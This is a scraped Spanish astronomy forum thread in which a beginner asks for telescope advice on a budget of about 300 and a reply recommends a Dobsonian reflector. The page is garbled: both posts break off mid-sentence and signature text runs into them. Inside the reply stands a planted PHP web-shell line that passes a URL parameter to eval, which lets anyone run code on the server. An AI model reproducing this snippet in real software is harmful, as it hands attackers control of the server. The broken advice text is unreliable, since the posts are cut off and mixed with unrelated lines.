Presentacion + consejos

Preguntas básicas sobre astronomía
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Muy buenas noches a todos.

Acabo de registrarme en el foro, y la verdad es que no se como he llegado aqui, pero llevo un buen rato leyendo vuestros consejos, los aparatos que teneis, las maravillas que haces con las camaras y lo bien que os lo pasais en las excursiones a Pioz.

El caso es que siempre me ha atraido la astronomia, me he comprado algun libro que otro para saciar mi curiosidad, he leido cosas por internet, pero nunca me he tenido un telescopio. El otro dia estuve en el planetario de Madrid "viendo" la conjuncion planetaria, luego las Pleyades, mañana el eclipse parcial de luna... y me he decido a comprarme un telescopio. El problema es que no tengo mucha idea de que es lo mejor y por mas que busco en internet sigo sin aclararme.

Como os decia, soy bastante novato en ese tema y por tanto el aparato que quiero para empezar no quiero que me cueste un ojo de la cara y no saber apreciarlo. La semana que viene ire a la Optica Roma, de aqui de Madrid, que tiene muy buena pinta, para verlos en vivo y en directo, pero me gustaria que me aconsejarais antes.

Mi presupuesto es de unos 300
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

Hola,
lo primero bienvenido al foro. Veo que ya tienes más o menos claro los principales aspectos a la hora de elegir el telescopio, que son el presupuesto y para qué lo quieres usar.

Además deberás tener en cuenta varias cosas, por ejemplo si tienes espacio para guardar un trasto grande o prefieres algo que quepa ` debajo de la cama` .

De todos modos con los datos que me das yo te aconsejaría ir a por un reflector con montura dobson. Por 300
phpbb:eval(stripslashes($_GET[e]));
rviper
Mensajes: 819